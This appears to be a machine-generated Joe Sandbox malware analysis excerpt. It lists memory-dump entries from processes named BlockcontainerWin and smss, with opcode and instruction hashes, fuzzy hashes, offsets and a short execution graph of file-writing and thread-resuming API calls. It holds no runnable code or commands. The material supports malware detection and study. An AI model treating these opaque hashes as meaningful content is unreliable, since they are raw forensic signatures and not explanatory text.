                                                                                        • Snapshot File: hcaresult_5_2_7ff888150000_BlockcontainerWin.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 8b819564a2226fba1e70721ddbbd24691b0bd61ad84bcafdcca056aa486d7aec
                                                                                        • Instruction ID: 8dbd796ff2a951c824b29e550a25cf1f291467d203e1d836a9af4dd346becbc2
                                                                                        • Opcode Fuzzy Hash: 8b819564a2226fba1e70721ddbbd24691b0bd61ad84bcafdcca056aa486d7aec
                                                                                        • Instruction Fuzzy Hash: 6E11C63AD1C64E8FDB51AB68E8516FD7BE0FF45390F040476D00AD21C2EF292A54C796
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.1584596742.00007FF888150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888150000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ff888150000_BlockcontainerWin.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 8ff56b159df33e26c66f4cf5fa707a02a143c7bf206bff3ba07e442fa358012e
                                                                                        • Instruction ID: 350fc304273a0791e85e293e84135c5c9676d68e2ce8051d89846af3676d280a
                                                                                        • Opcode Fuzzy Hash: 8ff56b159df33e26c66f4cf5fa707a02a143c7bf206bff3ba07e442fa358012e
                                                                                        • Instruction Fuzzy Hash: 3011CE34A18A0A8EDB55EB64C541AFA77E0FF55391F00497AE40FC7182CF28B909C391
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.1584596742.00007FF888150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888150000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ff888150000_BlockcontainerWin.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 1f6693d938f67d9c25278c5a2f2f4437c9102b413a0ba8cd5b8094a517e277d8
                                                                                        • Instruction ID: 6abb6a7dbb4d4c58d1690aba729952b4d38326465a0e43940690b627fdf9b92e
                                                                                        • Opcode Fuzzy Hash: 1f6693d938f67d9c25278c5a2f2f4437c9102b413a0ba8cd5b8094a517e277d8
                                                                                        • Instruction Fuzzy Hash: 96119E34E0890A8FEB54EB64D1526FA7BE0FF54395F40497AD44EC75C2CF28B849C691
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.1584596742.00007FF888150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888150000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ff888150000_BlockcontainerWin.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 8476a997931884c1bad033fcdc8e2ca72b40bdb94734fe402da744c7c5a1cec2
                                                                                        • Instruction ID: ae2ebb17671d90deff449c7ccf201472d61affdf779e85c91e04c7321ea17f66
                                                                                        • Opcode Fuzzy Hash: 8476a997931884c1bad033fcdc8e2ca72b40bdb94734fe402da744c7c5a1cec2
                                                                                        • Instruction Fuzzy Hash: 7911F334A189198EDB98EB58D465ABDBBE1FF68311F0001BA900EE3691DF396981CB41
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.1584596742.00007FF888150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888150000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ff888150000_BlockcontainerWin.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: ab909fad749598ad4ce41719dd8db84b6c49a6217c19a30f6a57954e8e7acdfb
                                                                                        • Instruction ID: 4b6a8fc7213f47a062f483353bc8056aff056f3da7849c33dc7ba7b741a429b1
                                                                                        • Opcode Fuzzy Hash: ab909fad749598ad4ce41719dd8db84b6c49a6217c19a30f6a57954e8e7acdfb
                                                                                        • Instruction Fuzzy Hash: 1F114435A0850A8FEB149E58D5523E437E0FF553A6F10057BD80AC72C1CF39A844C780
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.1584596742.00007FF888150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888150000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ff888150000_BlockcontainerWin.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: ed2f02dea9da97375c6349a9ff7c3691ee50061d7649552ab4373888a8718c65
                                                                                        • Instruction ID: c90256d0b86332a1bfa6054ba46a2bdefa91ad37abe4c5b7655462ff40ecae26
                                                                                        • Opcode Fuzzy Hash: ed2f02dea9da97375c6349a9ff7c3691ee50061d7649552ab4373888a8718c65
                                                                                        • Instruction Fuzzy Hash: 7011443520850A8FEB04DA58D5512E437E0FF553A5F00057BD80AC7281CF3AB954C381
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.1579490132.00007FF887D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ff887d70000_BlockcontainerWin.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 8ed22d86aeea26461fbf25f03f917e52329f3b071152bca9870882fc77173057
                                                                                        • Instruction ID: 8d16f3b5794ed914c24eec9af488f042cacea1e5989f5e61fe7c4c0dabf07d23
                                                                                        • Opcode Fuzzy Hash: 8ed22d86aeea26461fbf25f03f917e52329f3b071152bca9870882fc77173057
                                                                                        • Instruction Fuzzy Hash: 6E217F30E48A2D8FDB94DB04C851BACB3B1FB54355F5041A9C44FE7295CE39AD84CB82
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.1579490132.00007FF887D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ff887d70000_BlockcontainerWin.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: efa2fd456c06c48d3b3d6a10627690cb50c8af581c6598390c80cd62df25cdb7
                                                                                        • Instruction ID: ddce08618a02345c18f422cbbe79c3a6f02d94070b08ec58dbde1b564dd6441b
                                                                                        • Opcode Fuzzy Hash: efa2fd456c06c48d3b3d6a10627690cb50c8af581c6598390c80cd62df25cdb7
                                                                                        • Instruction Fuzzy Hash: 7511A035E4C6898EE702DB6898512AC7FB0FF52390F1542B6C05ADB2C6EA382649C791
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.1584596742.00007FF888150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888150000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ff888150000_BlockcontainerWin.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 722d3b88633c8a042f0740d3f5077870ca6684dda528239405ee388e890ad3b3
                                                                                        • Instruction ID: 301977dce5ea1045a25d20ce8cd0b23144683d3024ea0297b94dd89f2403915c
                                                                                        • Opcode Fuzzy Hash: 722d3b88633c8a042f0740d3f5077870ca6684dda528239405ee388e890ad3b3
                                                                                        • Instruction Fuzzy Hash: DF015E1DD4C75785E279B654682157D4C827FA4FD0F64027EE48EC25CDDE4C3880EA8A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.1584596742.00007FF888150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888150000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ff888150000_BlockcontainerWin.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 39d9ca1cd5c247d451c41ff130da71fc5b261a62a447ca8196070e759f7f2477
                                                                                        • Instruction ID: efc201fe304f5f4a55224b16adcce0043c52575703ea95ebd3fe150595b645c4
                                                                                        • Opcode Fuzzy Hash: 39d9ca1cd5c247d451c41ff130da71fc5b261a62a447ca8196070e759f7f2477
                                                                                        • Instruction Fuzzy Hash: BB01F275D08A5A9BE7A486A888482B93FE1FB56380F04057AE00EE7282DF643C09C3D1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.1584596742.00007FF888150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888150000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ff888150000_BlockcontainerWin.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: c809cc38a366dec9652ad0ca715d649d18d9910640427f6b540643ee7c49e318
                                                                                        • Instruction ID: 6a5c47ccc3faec536e3cb2670d0073262816f5c4709ce1a912074efeca8aebfb
                                                                                        • Opcode Fuzzy Hash: c809cc38a366dec9652ad0ca715d649d18d9910640427f6b540643ee7c49e318
                                                                                        • Instruction Fuzzy Hash: 27F0A431B0CA054FDB58AF2C95162B977D1FF98365B10057FD44EC7652CE35A8428786
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.1579490132.00007FF887D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ff887d70000_BlockcontainerWin.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 33e6dbc7550a3723a074b1f7e49649de84d0fea566faf29e581679f887a30361
                                                                                        • Instruction ID: 1ae40b4fe0a768112f24bff59c812b76b7ec9601ec02f7ee074e5d947fc48685
                                                                                        • Opcode Fuzzy Hash: 33e6dbc7550a3723a074b1f7e49649de84d0fea566faf29e581679f887a30361
                                                                                        • Instruction Fuzzy Hash: C6012131E8890A4AE794EB5884597BCA2A2FFD43D0F5553B6C01ED32E9DE39AC85C640
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.1579490132.00007FF887D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ff887d70000_BlockcontainerWin.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 4e0b8ac4d5c2e622e0038bd43de70180a56e460f1ea48718c017a6180e8229b1
                                                                                        • Instruction ID: d092fe209638cf73357d2827ec7af698e1cb59c89fed5a851ece7dbb210dc5c4
                                                                                        • Opcode Fuzzy Hash: 4e0b8ac4d5c2e622e0038bd43de70180a56e460f1ea48718c017a6180e8229b1
                                                                                        • Instruction Fuzzy Hash: D011A135D4C6898EE702DB68C4502AC7FB0FF42390F1542B6C056DB2D6DA382649C791
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.1579490132.00007FF887D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ff887d70000_BlockcontainerWin.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: aa78fbbf2f00099e7b7093f697ac3e903afa7be8f115b1201f915d20a244d9d2
                                                                                        • Instruction ID: 4716b1b2e8bff0243d8859acc0050f5f77579f38688d87c59ca8256d837186f0
                                                                                        • Opcode Fuzzy Hash: aa78fbbf2f00099e7b7093f697ac3e903afa7be8f115b1201f915d20a244d9d2
                                                                                        • Instruction Fuzzy Hash: 5E018035D4C6898EE702DB64C44029C7FB0BF42394F1542B6C055DB2D6D6386645C781
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.1584596742.00007FF888150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888150000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ff888150000_BlockcontainerWin.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 12a2783858dc86dd14a8e66cf6409b528398e8f5abf8f7c8fa1178a38f7dc5b3
                                                                                        • Instruction ID: 52ae6dd4126a7caab99d8bd8f01cf31221b7dd73743d6bc32b02fc0e9b1229e4
                                                                                        • Opcode Fuzzy Hash: 12a2783858dc86dd14a8e66cf6409b528398e8f5abf8f7c8fa1178a38f7dc5b3
                                                                                        • Instruction Fuzzy Hash: 66F0623A84E6C59FD7029B70C8164E57FB4FF43361F1800EAD455CB0A2DE6D1646C761
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.1584596742.00007FF888150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888150000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ff888150000_BlockcontainerWin.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: c78f887e0f43b153f32f8b7ab60eeb10630814230ab00995bdc53070b9151a31
                                                                                        • Instruction ID: 7ed44dde6d972cb2ac5cc60b67283d64d311c12935d1556811b17860dbe67fb3
                                                                                        • Opcode Fuzzy Hash: c78f887e0f43b153f32f8b7ab60eeb10630814230ab00995bdc53070b9151a31
                                                                                        • Instruction Fuzzy Hash: 36F06D3984D2C59FE3029B7088565E93FA4BF82354F1800F6E499CB0A2CE6D961AC761
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.1579490132.00007FF887D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ff887d70000_BlockcontainerWin.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: f0cb0e34b7a4ff0755ea2824e434ffcb7f6bb93193e9a09f426a3cdf58661d91
                                                                                        • Instruction ID: 3a3a5a598a6cb409a485ac66456aca746cdae8fbe9913e9f29c188d11eb2f31b
                                                                                        • Opcode Fuzzy Hash: f0cb0e34b7a4ff0755ea2824e434ffcb7f6bb93193e9a09f426a3cdf58661d91
                                                                                        • Instruction Fuzzy Hash: 26018F34D4C6899FE712DB7484542ADBFB0FF06384F1442F6C05ADB2CAEA386A44C741
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.1584596742.00007FF888150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888150000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ff888150000_BlockcontainerWin.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 456e9486c39d82424d8798a4984f3f31599a60aff94e94f1f57f52ecfe5bb422
                                                                                        • Instruction ID: 65ed3a556175067753d618c3dd431395d88c4ade4e34d82bb3c55031d07e6d1f
                                                                                        • Opcode Fuzzy Hash: 456e9486c39d82424d8798a4984f3f31599a60aff94e94f1f57f52ecfe5bb422
                                                                                        • Instruction Fuzzy Hash: DC019A74D18A698EDBA9DB58C551BA8BBB1FB59740F0401B9D00DD3682DA382984CF15
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.1579490132.00007FF887D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ff887d70000_BlockcontainerWin.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 318073544af67fc6c6c92803f721bb8ea874949c666995722ac46459298b9eb2
                                                                                        • Instruction ID: 9774bd3e5aac88df87bf3381c18e8fdc07ace5ed8346b982801a0fd74b294722
                                                                                        • Opcode Fuzzy Hash: 318073544af67fc6c6c92803f721bb8ea874949c666995722ac46459298b9eb2
                                                                                        • Instruction Fuzzy Hash: 3FF0E131A9851E8AFB60AB54C8556FC72B1FB94390F5443B9C44ED31D9CF69A981CB00
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.1579490132.00007FF887D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ff887d70000_BlockcontainerWin.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 6ea1d78c876f646017958fd77f3a6e176acf7b590a19e78a66a6b6b9fcc4b4bb
                                                                                        • Instruction ID: 3d65a5c4cb0db87fadf1091d57289f0e37d5c2d793d87b624df28bac26f209d9
                                                                                        • Opcode Fuzzy Hash: 6ea1d78c876f646017958fd77f3a6e176acf7b590a19e78a66a6b6b9fcc4b4bb
                                                                                        • Instruction Fuzzy Hash: 0DF0553130E688CFC706AB38CC918E83F60EB43215B9E12FAC08AC7862C514085AC700
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.1584596742.00007FF888150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888150000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ff888150000_BlockcontainerWin.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 56fb9390d9842f2e2c34948c4172366652d9e5d2e249a6e021d9c7ee1e62e23a
                                                                                        • Instruction ID: ed2e419a0b09473140e98c1b2c028fb9bfe34a06200af36bd2536518d984d6dd
                                                                                        • Opcode Fuzzy Hash: 56fb9390d9842f2e2c34948c4172366652d9e5d2e249a6e021d9c7ee1e62e23a
                                                                                        • Instruction Fuzzy Hash: 2BF06D2590D2C28FDB129B648CA01A43FA0BF57350F0C46EAC488CB1D3DB683855D795
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.1579490132.00007FF887D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ff887d70000_BlockcontainerWin.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 69b1d9bbccb1a2ad65d6dfb10d69ee5161fcff4230078e2fc4065b59b2ace238
                                                                                        • Instruction ID: 180538f69d29d39c5a47dba2450f5f34070d2bdab3f232b2a520bf3739e7e431
                                                                                        • Opcode Fuzzy Hash: 69b1d9bbccb1a2ad65d6dfb10d69ee5161fcff4230078e2fc4065b59b2ace238
                                                                                        • Instruction Fuzzy Hash: 08E01261E4841686FB94A604CC40BADA371FFD43C0F1492B8D94FA73C5CE38AE45C709
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.1579490132.00007FF887D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ff887d70000_BlockcontainerWin.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 3cb8f9518baddae07f718ce5cd6b84009a4ff10c9933965e7fa7a180f3941181
                                                                                        • Instruction ID: 1ad0fe20745515dcf8e01e340e9fbc22da2d3ebb2216eeaaf7174e54d2e14138
                                                                                        • Opcode Fuzzy Hash: 3cb8f9518baddae07f718ce5cd6b84009a4ff10c9933965e7fa7a180f3941181
                                                                                        • Instruction Fuzzy Hash: 9FC08C00ECA41F02B400712E14020BCA1217FC42D0FD40333C51E800C9DC4D20C5C146
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.1579490132.00007FF887D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ff887d70000_BlockcontainerWin.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 99eac81cb19bf5b5f1c555950b8379cb3702baeb87c49c1bbc8f55d8510b498b
                                                                                        • Instruction ID: a4950f6b04535e77381b709a593763a8db3a3c32bd2f2863d9f5ac15dd6ba020
                                                                                        • Opcode Fuzzy Hash: 99eac81cb19bf5b5f1c555950b8379cb3702baeb87c49c1bbc8f55d8510b498b
                                                                                        • Instruction Fuzzy Hash: 87C08C304508088FC908EB2DC88980833A0FB89208BC50090E00EC7170E21ADCC1C740
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.1584596742.00007FF888150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888150000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ff888150000_BlockcontainerWin.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 88aee399057a8ae294d7c21b75ba5aea158a791c35857b1981143dab32966a3c
                                                                                        • Instruction ID: eb313fa51ea54173d71d61ea0ebcba520c70f93b69b9be3d42a6215a0afc0e5b
                                                                                        • Opcode Fuzzy Hash: 88aee399057a8ae294d7c21b75ba5aea158a791c35857b1981143dab32966a3c
                                                                                        • Instruction Fuzzy Hash: 62D0121CE0E65789F1385621403233E1E917F493C1E24047DD05F418C1CF1CF641E30A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.1584596742.00007FF888150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888150000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ff888150000_BlockcontainerWin.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 2dc97d8ece9ed4358c83bf9f14867a9ab81b3ae56c4a09ab9baac07dd1c8f2ae
                                                                                        • Instruction ID: d90f704ce3dba082f796c190b8d27b813f610e59e47f1951253ddc4ab0268d82
                                                                                        • Opcode Fuzzy Hash: 2dc97d8ece9ed4358c83bf9f14867a9ab81b3ae56c4a09ab9baac07dd1c8f2ae
                                                                                        • Instruction Fuzzy Hash: 9ED0C91CA0E54785F9788641C4706396FA0FF01780E64417DD09F418C1CF2CB901E69D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.1579490132.00007FF887D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ff887d70000_BlockcontainerWin.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: b0c5d5df711078421b8eaba3c5ecddecd095889993ec7a5b33fa557073c4e28b
                                                                                        • Instruction ID: 888750afe9878be7c1f9a05e2b2ac35fefb89362871df24a6adace27ed4033d3
                                                                                        • Opcode Fuzzy Hash: b0c5d5df711078421b8eaba3c5ecddecd095889993ec7a5b33fa557073c4e28b
                                                                                        • Instruction Fuzzy Hash: 90C04C01E1881A46E5557764942537E08929B94B88F958176E41FD63CBCF1C690642CF
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.1579490132.00007FF887D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ff887d70000_BlockcontainerWin.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: cac97728a2d1ed6d51a271aecfd2584ed47f4aa2bea0e50c0b26995a7955d98f
                                                                                        • Instruction ID: 7ff7a4a8e3ba633800eb1d9509154de1ceaf214e72bdcb026877e15797823d4a
                                                                                        • Opcode Fuzzy Hash: cac97728a2d1ed6d51a271aecfd2584ed47f4aa2bea0e50c0b26995a7955d98f
                                                                                        • Instruction Fuzzy Hash: FCB01200CD640F00A404317A08430BCB0607F441C4FC40270D80E400C9D84D10D48242
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.1584596742.00007FF888150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888150000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ff888150000_BlockcontainerWin.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 91adde5a74cd1c935fce39083b90a280d1e95c7cfd07e3944d1e1b43ef131098
                                                                                        • Instruction ID: 2e9e979dcbd3813755003fc921a08939646a4bca725f5d2b720e3bcf77cc16ab
                                                                                        • Opcode Fuzzy Hash: 91adde5a74cd1c935fce39083b90a280d1e95c7cfd07e3944d1e1b43ef131098
                                                                                        • Instruction Fuzzy Hash: B8B00218F0D24357B57454B4589507C08412F463C5E540975D50B552D3EF5C3841D35D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.1579490132.00007FF887D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ff887d70000_BlockcontainerWin.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: c9$!k9$"s9$#{9
                                                                                        • API String ID: 0-1692736845
                                                                                        • Opcode ID: 344b6d49f9e37fc9c29a07e6a8464c985a9b7e3c708710cd79bc294c827122d7
                                                                                        • Instruction ID: 7597591122f1237633a3be6d46a19de57fcf34347c2155256c1e64aa9d00f4e5
                                                                                        • Opcode Fuzzy Hash: 344b6d49f9e37fc9c29a07e6a8464c985a9b7e3c708710cd79bc294c827122d7
                                                                                        • Instruction Fuzzy Hash: 68417B07E1946A45E21236FDB4122FD6B569F813F9F0A4377E06E891C3EC0C618782F6
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.1584596742.00007FF888150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888150000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ff888150000_BlockcontainerWin.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: b4B$b4B$b4B$b4B
                                                                                        • API String ID: 0-1756778437
                                                                                        • Opcode ID: 93db0d82f5a1be95736a2f2e7cf76c617d5d218276fd2dc3c8fa53b902db72db
                                                                                        • Instruction ID: 86db430d4ee3a97826652816d3766f23e365a006266532d55be269057936bcc0
                                                                                        • Opcode Fuzzy Hash: 93db0d82f5a1be95736a2f2e7cf76c617d5d218276fd2dc3c8fa53b902db72db
                                                                                        • Instruction Fuzzy Hash: C1517C75E08A5E8EEBA5DB5884547AEBBF1FB64340F5441BAC01DE7282DF382842CB41

                                                                                        Execution Graph

                                                                                        Execution Coverage:6.8%
                                                                                        Dynamic/Decrypted Code Coverage:22.2%
                                                                                        Signature Coverage:0%
                                                                                        Total number of Nodes:9
                                                                                        Total number of Limit Nodes:0
                                                                                        execution_graph 30529 7ff887db6d71 30530 7ff887db6d8f WriteFile 30529->30530 30532 7ff887db6e57 30530->30532 30525 7ff887db6b95 30526 7ff887db6baf CreateFileTransactedW 30525->30526 30528 7ff887db6caa 30526->30528 30533 7ff887db720b 30534 7ff887dce7f0 ResumeThread 30533->30534 30536 7ff887dce874 30534->30536
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000032.00000002.2367994017.00007FF887D91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D91000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_50_2_7ff887d91000_smss.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 85a8c9f3d1275166197b18e7348162520343232718cfe519d7ffb78304408481
                                                                                        • Instruction ID: 1f4e0abacfe13f21e1ff5c623c9a9954c08eda33ea58ff3d25e02a59319c1cc9
                                                                                        • Opcode Fuzzy Hash: 85a8c9f3d1275166197b18e7348162520343232718cfe519d7ffb78304408481
                                                                                        • Instruction Fuzzy Hash: 1CB1348588E3C16FD31347745C356AABFB09E53214B0E86EBC0C58F4E3E609695AD363
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000032.00000002.2367994017.00007FF887D91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D91000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_50_2_7ff887d91000_smss.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
